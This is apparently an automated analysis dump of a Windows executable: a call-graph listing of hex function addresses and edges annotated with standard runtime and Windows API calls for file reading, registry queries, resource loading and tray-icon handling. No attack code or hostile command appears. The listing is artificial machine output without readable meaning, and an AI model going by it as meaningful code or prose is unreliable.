96858->96859 96859->96803 96859->96804 96861 2655ea 96860->96861 96862 26adf4 8 API calls 96861->96862 96863 263ac4 96862->96863 96863->96810 96865 261371 __fread_nolock 96864->96865 96866 261352 96864->96866 96867 28014b 8 API calls 96865->96867 96868 28017b 8 API calls 96866->96868 96869 261388 96867->96869 96868->96865 96869->96827 96870->96820 97050 26663e LoadLibraryA 96871->97050 96876 2a5648 96879 2666e7 68 API calls 96876->96879 96877 2666a4 LoadLibraryExW 97058 266607 LoadLibraryA 96877->97058 96881 2a564f 96879->96881 96883 266607 3 API calls 96881->96883 96885 2a5657 96883->96885 96884 2666ce 96884->96885 96886 2666da 96884->96886 97079 26684a 96885->97079 96887 2666e7 68 API calls 96886->96887 96890 2662fa 96887->96890 96890->96831 96890->96832 96892 2a567e 96894 263b62 96893->96894 96895 2a415f 96893->96895 96897 28017b 8 API calls 96894->96897 97376 2ca215 81 API calls __wsopen_s 96895->97376 96898 263b86 96897->96898 96899 267aab CloseHandle 96898->96899 96900 263b94 96899->96900 96901 26bf73 8 API calls 96900->96901 96904 263b9d 96901->96904 96902 263bfa 96905 26bf73 8 API calls 96902->96905 96903 263bec 96903->96902 96906 2a4179 96903->96906 97377 2cd5aa SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 96903->97377 96907 267aab CloseHandle 96904->96907 96909 263c06 96905->96909 96906->96902 96906->96903 97306 263ae9 96909->97306 96911 2a41d5 96911->96902 96997 2d36d4 96996->96997 96998 266874 64 API calls 96997->96998 96999 2d36e8 96998->96999 97412 2d3827 96999->97412 97002 26684a 40 API calls 97003 2d3717 97002->97003 97004 26684a 40 API calls 97003->97004 97005 2d3727 97004->97005 97006 26684a 40 API calls 97005->97006 97016 2d3700 97016->96834 97019 28017b 8 API calls 97018->97019 97020 2ca028 __fread_nolock 97019->97020 97020->96851 97022 2d1524 97021->97022 97023 28014b 8 API calls 97022->97023 97024 2d153b 97023->97024 97025 26b329 8 API calls 97024->97025 97028 26bc33 97027->97028 97034 26bbb9 __fread_nolock 97027->97034 97030 28017b 8 API calls 97028->97030 97029 28014b 8 API calls 97031 26bbc0 97029->97031 97030->97034 97033 28014b 8 API calls 97031->97033 97034->97029 97036 265d34 97035->97036 97040 265dd8 97035->97040 97037 28017b 8 API calls 97036->97037 97039 265d66 97036->97039 97037->97039 97038 28014b 8 API calls 97038->97039 97039->97038 97039->97040 97040->96851 97042 2666f1 97041->97042 97043 2666f8 97041->97043 97047->96845 97048->96851 97049->96849 97051 266656 GetProcAddress 97050->97051 97052 266674 97050->97052 97053 266666 97051->97053 97055 28e95b 97052->97055 97053->97052 97054 26666d FreeLibrary 97053->97054 97054->97052 97087 28e89a 97055->97087 97057 266698 97057->96876 97057->96877 97059 26661c GetProcAddress 97058->97059 97060 26663b 97058->97060 97061 26662c 97059->97061 97063 266720 97060->97063 97061->97060 97062 266634 FreeLibrary 97061->97062 97062->97060 97064 28017b 8 API calls 97063->97064 97065 266735 97064->97065 97139 26423c 97065->97139 97067 266741 __fread_nolock 97068 2a56c2 97067->97068 97073 26677c 97067->97073 97147 2d3a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 97067->97147 97148 2d3a92 74 API calls 97068->97148 97071 26684a 40 API calls 97071->97073 97072 2a5706 97142 266874 97072->97142 97073->97071 97073->97072 97074 266874 64 API calls 97073->97074 97076 266810 messages 97073->97076 97074->97073 97076->96884 97078 26684a 40 API calls 97078->97076 97080 26685c 97079->97080 97082 2a5760 97079->97082 97180 28ec34 97080->97180 97084 2d32bd 97289 2d310d 97084->97289 97086 2d32d8 97086->96892 97090 28e8a6 CallCatchBlock 97087->97090 97088 28e8b4 97112 28f649 20 API calls _free 97088->97112 97090->97088 97092 28e8e4 97090->97092 97091 28e8b9 97113 292b5c 26 API calls _strftime 97091->97113 97094 28e8e9 97092->97094 97095 28e8f6 97092->97095 97114 28f649 20 API calls _free 97094->97114 97104 2983e1 97095->97104 97098 28e8ff 97099 28e905 97098->97099 97101 28e912 97098->97101 97115 28f649 20 API calls _free 97099->97115 97116 28e944 LeaveCriticalSection __fread_nolock 97101->97116 97103 28e8c4 __wsopen_s 97103->97057 97105 2983ed CallCatchBlock 97104->97105 97117 2932d1 EnterCriticalSection 97105->97117 97107 2983fb 97118 29847b 97107->97118 97111 29842c __wsopen_s 97111->97098 97112->97091 97113->97103 97114->97103 97115->97103 97116->97103 97117->97107 97127 29849e 97118->97127 97119 2984f7 97121 294ff0 BuildCatchObjectHelperInternal 20 API calls 97119->97121 97120 298408 97131 298437 97120->97131 97122 298500 97121->97122 97124 292d38 _free 20 API calls 97122->97124 97125 298509 97124->97125 97125->97120 97136 293778 11 API calls 2 library calls 97125->97136 97127->97119 97127->97120 97134 2894fd EnterCriticalSection 97127->97134 97135 289511 LeaveCriticalSection 97127->97135 97128 298528 97137 2894fd EnterCriticalSection 97128->97137 97138 293319 LeaveCriticalSection 97131->97138 97133 29843e 97133->97111 97134->97127 97135->97127 97136->97128 97137->97120 97138->97133 97140 28014b 8 API calls 97139->97140 97141 26424e 97140->97141 97141->97067 97143 266883 97142->97143 97144 2a5780 97142->97144 97149 28f053 97143->97149 97147->97068 97148->97073 97152 28ee1a 97149->97152 97151 266891 97151->97078 97153 28ee26 CallCatchBlock 97152->97153 97154 28ee32 97153->97154 97155 28ee58 97153->97155 97177 28f649 20 API calls _free 97154->97177 97165 2894fd EnterCriticalSection 97155->97165 97158 28ee37 97178 292b5c 26 API calls _strftime 97158->97178 97159 28ee64 97166 28ef7a 97159->97166 97162 28ee78 97179 28ee97 LeaveCriticalSection __fread_nolock 97162->97179 97164 28ee42 __wsopen_s 97164->97151 97165->97159 97167 28ef9c 97166->97167 97168 28ef8c 97166->97168 97169 28eea1 28 API calls 97167->97169 97170 28f649 _free 20 API calls 97168->97170 97172 28efbf 97169->97172 97171 28ef91 97170->97171 97171->97162 97173 28f03e 97172->97173 97174 28df7b 62 API calls 97172->97174 97173->97162 97175 28efe6 97174->97175 97176 2997a4 __wsopen_s 28 API calls 97175->97176 97176->97173 97177->97158 97178->97164 97179->97164 97183 28ec51 97180->97183 97182 26686d 97182->97084 97184 28ec5d CallCatchBlock 97183->97184 97185 28ec9d 97184->97185 97186 28ec95 __wsopen_s 97184->97186 97191 28ec70 ___scrt_fastfail 97184->97191 97196 2894fd EnterCriticalSection 97185->97196 97186->97182 97188 28eca7 97197 28ea68 97188->97197 97210 28f649 20 API calls _free 97191->97210 97192 28ec8a 97211 292b5c 26 API calls _strftime 97192->97211 97196->97188 97198 28ea97 97197->97198 97201 28ea7a ___scrt_fastfail 97197->97201 97212 28ecdc LeaveCriticalSection __fread_nolock 97198->97212 97199 28ea87 97285 28f649 20 API calls _free 97199->97285 97201->97198 97201->97199 97203 28eada __fread_nolock 97201->97203 97203->97198 97206 28ebf6 ___scrt_fastfail 97203->97206 97213 28dcc5 97203->97213 97220 2990c5 97203->97220 97287 28d2e8 26 API calls 4 library calls 97203->97287 97288 28f649 20 API calls _free 97206->97288 97208 28ea8c 97286 292b5c 26 API calls _strftime 97208->97286 97210->97192 97211->97186 97212->97186 97214 28dcd1 97213->97214 97215 28dce6 97213->97215 97216 28f649 _free 20 API calls 97214->97216 97215->97203 97217 28dcd6 97216->97217 97218 292b5c _strftime 26 API calls 97217->97218 97219 28dce1 97218->97219 97219->97203 97221 2990ef 97220->97221 97222 2990d7 97220->97222 97224 299459 97221->97224 97229 299134 97221->97229 97223 28f636 __dosmaperr 20 API calls 97222->97223 97225 2990dc 97223->97225 97226 28f636 __dosmaperr 20 API calls 97224->97226 97227 28f649 _free 20 API calls 97225->97227 97228 29945e 97226->97228 97230 2990e4 97227->97230 97231 28f649 _free 20 API calls 97228->97231 97229->97230 97232 29913f 97229->97232 97236 29916f 97229->97236 97230->97203 97233 29914c 97231->97233 97234 28f636 __dosmaperr 20 API calls 97232->97234 97237 292b5c _strftime 26 API calls 97233->97237 97235 299144 97234->97235 97238 28f649 _free 20 API calls 97235->97238 97239 299188 97236->97239 97240 2991ae 97236->97240 97243 2991ca 97236->97243 97237->97230 97238->97233 97239->97240 97241 299195 97239->97241 97242 28f636 __dosmaperr 20 API calls 97240->97242 97248 29fc1b __fread_nolock 26 API calls 97241->97248 97245 2991b3 97242->97245 97244 293b93 __fread_nolock 21 API calls 97243->97244 97246 2991e1 97244->97246 97247 28f649 _free 20 API calls 97245->97247 97249 292d38 _free 20 API calls 97246->97249 97250 2991ba 97247->97250 97251 299333 97248->97251 97252 2991ea 97249->97252 97253 292b5c _strftime 26 API calls 97250->97253 97254 2993a9 97251->97254 97257 29934c GetConsoleMode 97251->97257 97255 292d38 _free 20 API calls 97252->97255 97282 2991c5 __fread_nolock 97253->97282 97256 2993ad ReadFile 97254->97256 97258 2991f1 97255->97258 97259 299421 GetLastError 97256->97259 97260 2993c7 97256->97260 97257->97254 97261 29935d 97257->97261 97262 2991fb 97258->97262 97263 299216 97258->97263 97264 29942e 97259->97264 97265 299385 97259->97265 97260->97259 97266 29939e 97260->97266 97261->97256 97267 299363 ReadConsoleW 97261->97267 97269 28f649 _free 20 API calls 97262->97269 97271 2997a4 __wsopen_s 28 API calls 97263->97271 97270 28f649 _free 20 API calls 97264->97270 97273 28f613 __dosmaperr 20 API calls 97265->97273 97265->97282 97278 2993ec 97266->97278 97279 299403 97266->97279 97266->97282 97267->97266 97272 29937f GetLastError 97267->97272 97268 292d38 _free 20 API calls 97268->97230 97271->97241 97272->97265 97273->97282 97279->97282 97282->97268 97285->97208 97286->97198 97287->97203 97288->97208 97292 28e858 97289->97292 97291 2d311c 97291->97086 97295 28e7d9 97292->97295 97294 28e875 97294->97291 97296 28e7e8 97295->97296 97297 28e7fc 97295->97297 97303 28f649 20 API calls _free 97296->97303 97302 28e7f8 __alldvrm 97297->97302 97305 2936b2 11 API calls 2 library calls 97297->97305 97299 28e7ed 97304 292b5c 26 API calls _strftime 97299->97304 97302->97294 97303->97299 97304->97302 97305->97302 97307 2a22d0 __wsopen_s 97306->97307 97376->96903 97377->96911 97413 2d383b 97412->97413 97414 26684a 40 API calls 97413->97414 97415 2d36fc 97413->97415 97416 2d32bd 27 API calls 97413->97416 97417 266874 64 API calls 97413->97417 97414->97413 97415->97002 97415->97016 97416->97413 97417->97413 97514->96671 97516 2639eb 97515->97516 97517 265f4e 97515->97517 97516->96680 97549 2cd11f 42 API calls _strftime 97516->97549 97517->97516 97518 2a5070 DestroyIcon 97517->97518 97518->97516 97520 2661c6 97519->97520 97521 2662a8 97519->97521 97550 267ad5 97520->97550 97521->96682 97524 2a5278 LoadStringW 97528 2a5292 97524->97528 97525 2661e1 97526 268577 8 API calls 97525->97526 97527 2661f6 97526->97527 97529 266203 97527->97529 97536 2a52ae 97527->97536 97531 26bed9 8 API calls 97528->97531 97535 266229 ___scrt_fastfail 97528->97535 97529->97528 97530 26620d 97529->97530 97532 266b7c 8 API calls 97530->97532 97531->97535 97533 26621b 97532->97533 97534 267bb5 8 API calls 97533->97534 97534->97535 97537 26628e Shell_NotifyIconW 97535->97537 97536->97535 97538 26bf73 8 API calls 97536->97538 97539 2a52f1 97536->97539 97537->97521 97540 2a52d8 97538->97540 97556 27fe6f 51 API calls 97539->97556 97555 2ca350 9 API calls 97540->97555 97543 2a5310 97545 266b7c 8 API calls 97543->97545 97544 2a52e3 97546 267bb5 8 API calls 97544->97546 97547 2a5321 97545->97547 97546->97539 97548 266b7c 8 API calls 97547->97548 97548->97535 97549->96680 97551 28017b 8 API calls 97550->97551 97552 267afa 97551->97552 97553 28014b 8 API calls 97552->97553 97554 2661d4 97553->97554 97554->97524 97554->97525 97555->97544 97556->97543 97558 266bb4 _wcslen 97557->97558 97559 266bc7 97558->97559 97560 2a5860 97558->97560 97567 267d74 97559->97567 97561 28014b 8 API calls 97560->97561 97564 2a586a 97561->97564 97563 266bd4 __fread_nolock 97563->96701 97565 28017b 8 API calls 97564->97565 97566 2a589a __fread_nolock 97565->97566 97568 267d8a 97567->97568 97571 267d85 __fread_nolock 97567->97571 97569 2a6528 97568->97569 97570 28017b 8 API calls 97568->97570 97570->97571 97571->97563 97573 267be7 97572->97573 97578 267c1b __fread_nolock 97572->97578 97574 2a644e 97573->97574 97575 267c0e 97573->97575 97573->97578 97576 28014b 8 API calls 97574->97576 97577 267d74 8 API calls 97575->97577 97579 2a645d 97576->97579 97577->97578 97578->96710 97580 28017b 8 API calls 97579->97580 97581 2a6491 __fread_nolock 97580->97581 97582->96711 97583 26f5e5 97586 26cab0 97583->97586 97587 26cacb 97586->97587 97588 2b14be 97587->97588 97589 2b150c 97587->97589 97614 26caf0 97587->97614 97592 2b14c8 97588->97592 97595 2b14d5 97588->97595 97588->97614 97631 2e62ff 207 API calls 2 library calls 97589->97631 97629 2e6790 207 API calls 97592->97629 97612 26cdc0 97595->97612 97630 2e6c2d 207 API calls 2 library calls 97595->97630 97598 2b179f 97598->97598 97600 26cf80 39 API calls 97600->97614 97601 27e807 39 API calls 97601->97614 97604 2b16e8 97633 2e6669 81 API calls 97604->97633 97607 26be2d 39 API calls 97607->97614 97608 26cdee 97609 26b4c8 8 API calls 97609->97614 97612->97608 97634 2d3fe1 81 API calls __wsopen_s 97612->97634 97613 270340 207 API calls 97613->97614 97614->97600 97614->97601 97614->97604 97614->97607 97614->97608 97614->97609 97614->97612 97614->97613 97615 26bed9 8 API calls 97614->97615 97617 27e7c1 39 API calls 97614->97617 97618 27aa99 207 API calls 97614->97618 97619 2805b2 5 API calls __Init_thread_wait 97614->97619 97620 27bc58 97614->97620 97625 280413 29 API calls __onexit 97614->97625 97626 280568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97614->97626 97627 27f4df 81 API calls 97614->97627 97628 27f346 207 API calls 97614->97628 97632 2bffaf 8 API calls 97614->97632 97615->97614 97617->97614 97618->97614 97619->97614 97621 28014b 8 API calls 97620->97621 97622 27bc65 97621->97622 97623 26b329 8 API calls 97622->97623 97624 27bc70 97623->97624 97624->97614 97625->97614 97626->97614 97627->97614 97628->97614 97629->97595 97630->97612 97631->97614 97632->97614 97633->97612 97634->97598 97635 28f06e 97636 28f07a CallCatchBlock 97635->97636 97637 28f09b 97636->97637 97638 28f086 97636->97638 97648 2894fd EnterCriticalSection 97637->97648 97654 28f649 20 API calls _free 97638->97654 97641 28f0a7 97649 28f0db 97641->97649 97642 28f08b 97655 292b5c 26 API calls _strftime 97642->97655 97647 28f096 __wsopen_s 97648->97641 97657 28f106 97649->97657 97651 28f0e8 97652 28f0b4 97651->97652 97677 28f649 20 API calls _free 97651->97677 97656 28f0d1 LeaveCriticalSection __fread_nolock 97652->97656 97654->97642 97655->97647 97656->97647 97658 28f12e 97657->97658 97659 28f114 97657->97659 97661 28dcc5 __fread_nolock 26 API calls 97658->97661 97681 28f649 20 API calls _free 97659->97681 97663 28f137 97661->97663 97662 28f119 97682 292b5c 26 API calls _strftime 97662->97682 97678 299789 97663->97678 97667 28f23b 97668 28f248 97667->97668 97675 28f1ee 97667->97675 97684 28f649 20 API calls _free 97668->97684 97669 28f1bf 97671 28f1dc 97669->97671 97669->97675 97683 28f41f 31 API calls 4 library calls 97671->97683 97673 28f1e6 97674 28f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 97673->97674 97674->97651 97675->97674 97685 28f29b 30 API calls 2 library calls 97675->97685 97677->97652 97686 299606 97678->97686 97680 28f153 97680->97667 97680->97669 97680->97674 97681->97662 97682->97674 97683->97673 97684->97674 97685->97674 97687 299612 CallCatchBlock 97686->97687 97688 29961a 97687->97688 97689 299632 97687->97689 97721 28f636 20 API calls _free 97688->97721 97691 2996e6 97689->97691 97695 29966a 97689->97695 97726 28f636 20 API calls _free 97691->97726 97692 29961f 97722 28f649 20 API calls _free 97692->97722 97711 2954ba EnterCriticalSection 97695->97711 97696 2996eb 97727 28f649 20 API calls _free 97696->97727 97699 299670 97701 2996a9 97699->97701 97702 299694 97699->97702 97700 2996f3 97728 292b5c 26 API calls _strftime 97700->97728 97712 29970b 97701->97712 97723 28f649 20 API calls _free 97702->97723 97704 299627 __wsopen_s 97704->97680 97707 299699 97724 28f636 20 API calls _free 97707->97724 97708 2996a4 97725 2996de LeaveCriticalSection __wsopen_s 97708->97725 97711->97699 97729 295737 97712->97729 97714 29971d 97715 299725 97714->97715 97716 299736 SetFilePointerEx 97714->97716 97742 28f649 20 API calls _free 97715->97742 97718 29974e GetLastError 97716->97718 97720 29972a 97716->97720 97743 28f613 20 API calls 2 library calls 97718->97743 97720->97708 97721->97692 97722->97704 97723->97707 97724->97708 97725->97704 97726->97696 97727->97700 97728->97704 97730 295759 97729->97730 97731 295744 97729->97731 97735 29577e 97730->97735 97746 28f636 20 API calls _free 97730->97746 97744 28f636 20 API calls _free 97731->97744 97734 295749 97745 28f649 20 API calls _free 97734->97745 97735->97714 97736 295789 97747 28f649 20 API calls _free 97736->97747 97739 295751 97739->97714 97740 295791 97748 292b5c 26 API calls _strftime 97740->97748 97742->97720 97743->97720 97744->97734 97745->97739 97746->97736 97747->97740 97748->97739 97749 26f4c0 97752 27a025 97749->97752 97751 26f4cc 97753 27a046 97752->97753 97758 27a0a3 97752->97758 97754 270340 207 API calls 97753->97754 97753->97758 97759 27a077 97754->97759 97756 2b806b 97756->97756 97757 27a0e7 97757->97751 97758->97757 97761 2d3fe1 81 API calls __wsopen_s 97758->97761 97759->97757 97759->97758 97760 26bed9 8 API calls 97759->97760 97760->97758 97761->97756 97762 298782 97767 29853e 97762->97767 97765 2987aa 97772 29856f try_get_first_available_module 97767->97772 97769 29876e 97786 292b5c 26 API calls _strftime 97769->97786 97771 2986c3 97771->97765 97779 2a0d04 97771->97779 97775 2986b8 97772->97775 97782 28917b 40 API calls 2 library calls 97772->97782 97774 29870c 97774->97775 97783 28917b 40 API calls 2 library calls 97774->97783 97775->97771 97785 28f649 20 API calls _free 97775->97785 97777 29872b 97777->97775 97784 28917b 40 API calls 2 library calls 97777->97784 97787 2a0401 97779->97787 97781 2a0d1f 97781->97765 97782->97774 97783->97777 97784->97775 97785->97769 97786->97771 97789 2a040d CallCatchBlock 97787->97789 97788 2a041b 97845 28f649 20 API calls _free 97788->97845 97789->97788 97791 2a0454 97789->97791 97798 2a09db 97791->97798 97792 2a0420 97846 292b5c 26 API calls _strftime 97792->97846 97797 2a042a __wsopen_s 97797->97781 97848 2a07af 97798->97848 97801 2a0a0d 97880 28f636 20 API calls _free 97801->97880 97802 2a0a26 97866 295594 97802->97866 97805 2a0a12 97881 28f649 20 API calls _free 97805->97881 97806 2a0a2b 97807 2a0a4b 97806->97807 97808 2a0a34 97806->97808 97879 2a071a CreateFileW 97807->97879 97882 28f636 20 API calls _free 97808->97882 97812 2a0a39 97883 28f649 20 API calls _free 97812->97883 97814 2a0b01 GetFileType 97816 2a0b0c GetLastError 97814->97816 97817 2a0b53 97814->97817 97815 2a0ad6 GetLastError 97885 28f613 20 API calls 2 library calls 97815->97885 97886 28f613 20 API calls 2 library calls 97816->97886 97888 2954dd 21 API calls 3 library calls 97817->97888 97818 2a0a84 97818->97814 97818->97815 97884 2a071a CreateFileW 97818->97884 97822 2a0b1a CloseHandle 97822->97805 97825 2a0b43 97822->97825 97824 2a0ac9 97824->97814 97824->97815 97887 28f649 20 API calls _free 97825->97887 97826 2a0b74 97831 2a0bc0 97826->97831 97889 2a092b 72 API calls 4 library calls 97826->97889 97828 2a0b48 97828->97805 97833 2a0bed 97831->97833 97890 2a04cd 72 API calls 4 library calls 97831->97890 97832 2a0be6 97832->97833 97834 2a0bfe 97832->97834 97891 298a2e 97833->97891 97836 2a0478 97834->97836 97837 2a0c7c CloseHandle 97834->97837 97847 2a04a1 LeaveCriticalSection __wsopen_s 97836->97847 97906 2a071a CreateFileW 97837->97906 97839 2a0ca7 97840 2a0cdd 97839->97840 97841 2a0cb1 GetLastError 97839->97841 97840->97836 97907 28f613 20 API calls 2 library calls 97841->97907 97843 2a0cbd 97908 2956a6 21 API calls 3 library calls 97843->97908 97845->97792 97846->97797 97847->97797 97849 2a07d0 97848->97849 97850 2a07ea 97848->97850 97849->97850 97916 28f649 20 API calls _free 97849->97916 97909 2a073f 97850->97909 97853 2a07df 97917 292b5c 26 API calls _strftime 97853->97917 97855 2a0822 97856 2a0851 97855->97856 97918 28f649 20 API calls _free 97855->97918 97864 2a08a4 97856->97864 97920 28da7d 26 API calls 2 library calls 97856->97920 97859 2a089f 97861 2a091e 97859->97861 97859->97864 97860 2a0846 97919 292b5c 26 API calls _strftime 97860->97919 97921 292b6c 11 API calls _abort 97861->97921 97864->97801 97864->97802 97865 2a092a 97867 2955a0 CallCatchBlock 97866->97867 97924 2932d1 EnterCriticalSection 97867->97924 97869 2955ee 97925 29569d 97869->97925 97870 2955cc 97928 295373 21 API calls 3 library calls 97870->97928 97873 295617 __wsopen_s 97873->97806 97874 2955a7 97874->97869 97874->97870 97876 29563a EnterCriticalSection 97874->97876 97875 2955d1 97875->97869 97929 2954ba EnterCriticalSection 97875->97929 97876->97869 97877 295647 LeaveCriticalSection 97876->97877 97877->97874 97879->97818 97880->97805 97881->97836 97882->97812 97883->97805 97884->97824 97885->97805 97886->97822 97887->97828 97888->97826 97889->97831 97890->97832 97892 295737 __wsopen_s 26 API calls 97891->97892 97895 298a3e 97892->97895 97893 298a44 97931 2956a6 21 API calls 3 library calls 97893->97931 97895->97893 97896 298a76 97895->97896 97897 295737 __wsopen_s 26 API calls 97895->97897 97896->97893 97898 295737 __wsopen_s 26 API calls 97896->97898 97900 298a6d 97897->97900 97901 298a82 CloseHandle 97898->97901 97899 298a9c 97902 298abe 97899->97902 97932 28f613 20 API calls 2 library calls 97899->97932 97903 295737 __wsopen_s 26 API calls 97900->97903 97901->97893 97904 298a8e GetLastError 97901->97904 97902->97836 97903->97896 97904->97893 97906->97839 97907->97843 97908->97840 97910 2a0757 97909->97910 97912 2a0772 97910->97912 97922 28f649 20 API calls _free 97910->97922 97912->97855 97913 2a0796 97923 292b5c 26 API calls _strftime 97913->97923 97915 2a07a1 97915->97855 97916->97853 97917->97850 97918->97860 97919->97856 97920->97859 97921->97865 97922->97913 97923->97915 97924->97874 97930 293319 LeaveCriticalSection 97925->97930 97927 2956a4 97927->97873 97928->97875 97929->97869 97930->97927 97931->97899 97932->97902 97933 29947a 97934 299487 97933->97934 97937 29949f 97933->97937 97983 28f649 20 API calls _free 97934->97983 97936 29948c 97984 292b5c 26 API calls _strftime 97936->97984 97939 2994fa 97937->97939 97947 299497 97937->97947 97985 2a0144 21 API calls 2 library calls 97937->97985 97941 28dcc5 __fread_nolock 26 API calls 97939->97941 97942 299512 97941->97942 97953 298fb2 97942->97953 97944 299519 97945 28dcc5 __fread_nolock 26 API calls 97944->97945 97944->97947 97946 299545 97945->97946 97946->97947 97948 28dcc5 __fread_nolock 26 API calls 97946->97948 97949 299553 97948->97949 97949->97947 97950 28dcc5 __fread_nolock 26 API calls 97949->97950 97951 299563 97950->97951 97952 28dcc5 __fread_nolock 26 API calls 97951->97952 97952->97947 97954 298fbe CallCatchBlock 97953->97954 97955 298fde 97954->97955 97956 298fc6 97954->97956 97957 2990a4 97955->97957 97961 299017 97955->97961 97987 28f636 20 API calls _free 97956->97987 97994 28f636 20 API calls _free 97957->97994 97960 298fcb 97988 28f649 20 API calls _free 97960->97988 97964 29903b 97961->97964 97965 299026 97961->97965 97962 2990a9 97995 28f649 20 API calls _free 97962->97995 97986 2954ba EnterCriticalSection 97964->97986 97989 28f636 20 API calls _free 97965->97989 97969 299033 97996 292b5c 26 API calls _strftime 97969->97996 97970 29902b 97990 28f649 20 API calls _free 97970->97990 97971 299041 97974 29905d 97971->97974 97975 299072 97971->97975 97972 298fd3 __wsopen_s 97972->97944 97991 28f649 20 API calls _free 97974->97991 97977 2990c5 __fread_nolock 38 API calls 97975->97977 97979 29906d 97977->97979 97993 29909c LeaveCriticalSection __wsopen_s 97979->97993 97980 299062 97992 28f636 20 API calls _free 97980->97992 97983->97936 97984->97947 97985->97939 97986->97971 97987->97960 97988->97972 97989->97970 97990->97969 97991->97980 97992->97979 97993->97972 97994->97962 97995->97969 97996->97972 97997 2636f5 98000 26370f 97997->98000 98001 263726 98000->98001 98002 263788 98001->98002 98003 26378a 98001->98003 98004 26372b 98001->98004 98007 26376f DefWindowProcW 98002->98007 98008 263790 98003->98008 98009 2a3df4 98003->98009 98005 263804 PostQuitMessage 98004->98005 98006 263738 98004->98006 98013 263709 98005->98013 98010 263743 98006->98010 98011 2a3e61 98006->98011 98007->98013 98014 263797 98008->98014 98015 2637bc SetTimer RegisterWindowMessageW 98008->98015 98055 262f92 10 API calls 98009->98055 98016 26380e 98010->98016 98017 26374d 98010->98017 98058 2cc8f7 65 API calls ___scrt_fastfail 98011->98058 98021 2637a0 KillTimer 98014->98021 98022 2a3d95 98014->98022 98015->98013 98018 2637e5 CreatePopupMenu 98015->98018 98045 27fcad 98016->98045 98023 2a3e46 98017->98023 98024 263758 98017->98024 98018->98013 98020 2a3e15 98056 27f23c 40 API calls 98020->98056 98030 263907 Shell_NotifyIconW 98021->98030 98028 2a3d9a 98022->98028 98029 2a3dd0 MoveWindow 98022->98029 98023->98007 98057 2c1423 8 API calls 98023->98057 98031 2637f2 98024->98031 98032 263763 98024->98032 98025 2a3e73 98025->98007 98025->98013 98033 2a3dbf SetFocus 98028->98033 98034 2a3da0 98028->98034 98029->98013 98035 2637b3 98030->98035 98053 26381f 75 API calls ___scrt_fastfail 98031->98053 98032->98007 98042 263907 Shell_NotifyIconW 98032->98042 98033->98013 98034->98032 98038 2a3da9 98034->98038 98052 2659ff DeleteObject DestroyWindow 98035->98052 98054 262f92 10 API calls 98038->98054 98040 263802 98040->98013 98043 2a3e3a 98042->98043 98044 26396b 60 API calls 98043->98044 98044->98002 98046 27fcc5 ___scrt_fastfail 98045->98046 98047 27fd4b 98045->98047 98048 2661a9 55 API calls 98046->98048 98047->98013 98050 27fcec 98048->98050 98049 27fd34 KillTimer SetTimer 98049->98047 98050->98049 98051 2bfe2b Shell_NotifyIconW 98050->98051 98051->98049 98052->98013 98053->98040 98054->98013 98055->98020 98056->98032 98057->98002 98058->98025 98059 261033 98064 2668b4 98059->98064 98063 261042 98065 26bf73 8 API calls 98064->98065 98066 266922 98065->98066 98072 26589f 98066->98072 98069 2669bf 98070 261038 98069->98070 98075 266b14 8 API calls __fread_nolock 98069->98075 98071 280413 29 API calls __onexit 98070->98071 98071->98063 98076 2658cb 98072->98076 98075->98069 98077 2658be 98076->98077 98078 2658d8 98076->98078 98077->98069 98078->98077 98079 2658df RegOpenKeyExW 98078->98079 98079->98077 98080 2658f9 RegQueryValueExW 98079->98080 98081 26592f RegCloseKey 98080->98081 98082 26591a 98080->98082 98081->98077 98082->98081 98083 270ebf 98084 270ed3 98083->98084 98089 271425 98083->98089 98085 270ee5 98084->98085 98086 28014b 8 API calls 98084->98086 98087 2b562c 98085->98087 98088 26b4c8 8 API calls 98085->98088 98090 270f3e 98085->98090 98086->98085 98179 2d1b14 8 API calls 98087->98179 98088->98085 98089->98085 98093 26bed9 8 API calls 98089->98093 98109 27049d messages 98090->98109 98116 272b20 98090->98116 98093->98085 98094 2b632b 98183 2d3fe1 81 API calls __wsopen_s 98094->98183 98095 271e50 40 API calls 98115 270376 messages 98095->98115 98096 271695 98101 26bed9 8 API calls 98096->98101 98096->98109 98097 28014b 8 API calls 98097->98115 98099 2b5cdb 98104 26bed9 8 API calls 98099->98104 98099->98109 98100 2b625a 98182 2d3fe1 81 API calls __wsopen_s 98100->98182 98101->98109 98104->98109 98105 26bed9 8 API calls 98105->98115 98107 2805b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98107->98115 98108 26bf73 8 API calls 98108->98115 98110 270aae messages 98181 2d3fe1 81 API calls __wsopen_s 98110->98181 98111 280568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98111->98115 98112 2b6115 98180 2d3fe1 81 API calls __wsopen_s 98112->98180 98114 280413 29 API calls pre_c_initialization 98114->98115 98115->98094 98115->98095 98115->98096 98115->98097 98115->98099 98115->98100 98115->98105 98115->98107 98115->98108 98115->98109 98115->98110 98115->98111 98115->98112 98115->98114 98178 271990 207 API calls 2 library calls 98115->98178 98117 272b86 98116->98117 98118 272fc0 98116->98118 98120 2b7bd8 98117->98120 98121 272ba0 98117->98121 98405 2805b2 5 API calls __Init_thread_wait 98118->98405 98368 2e7af9 98120->98368 98124 273160 9 API calls 98121->98124 98123 272fca 98127 26b329 8 API calls 98123->98127 98132 27300b 98123->98132 98126 272bb0 98124->98126 98125 2b7be4 98125->98115 98128 273160 9 API calls 98126->98128 98138 272fe4 98127->98138 98129 272bc6 98128->98129 98131 272bfc 98129->98131 98129->98132 98130 2b7bed 98130->98115 98133 2b7bfd 98131->98133 98157 272c18 __fread_nolock 98131->98157 98132->98130 98134 26b4c8 8 API calls 98132->98134 98409 2d3fe1 81 API calls __wsopen_s 98133->98409 98136 273049 98134->98136 98407 27e6e8 207 API calls 98136->98407 98137 2b7c10 98137->98115 98406 280568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98138->98406 98140 2b7c15 98410 2d3fe1 81 API calls __wsopen_s 98140->98410 98142 272d3f 98144 2b7c78 98142->98144 98145 272d4c 98142->98145 98412 2e61a2 53 API calls _wcslen 98144->98412 98146 273160 9 API calls 98145->98146 98148 272d59 98146->98148 98151 2b7da1 98148->98151 98153 273160 9 API calls 98148->98153 98149 28014b 8 API calls 98149->98157 98150 28017b 8 API calls 98150->98157 98151->98137 98413 2d3fe1 81 API calls __wsopen_s 98151->98413 98152 273082 98408 27fe39 8 API calls 98152->98408 98159 272d73 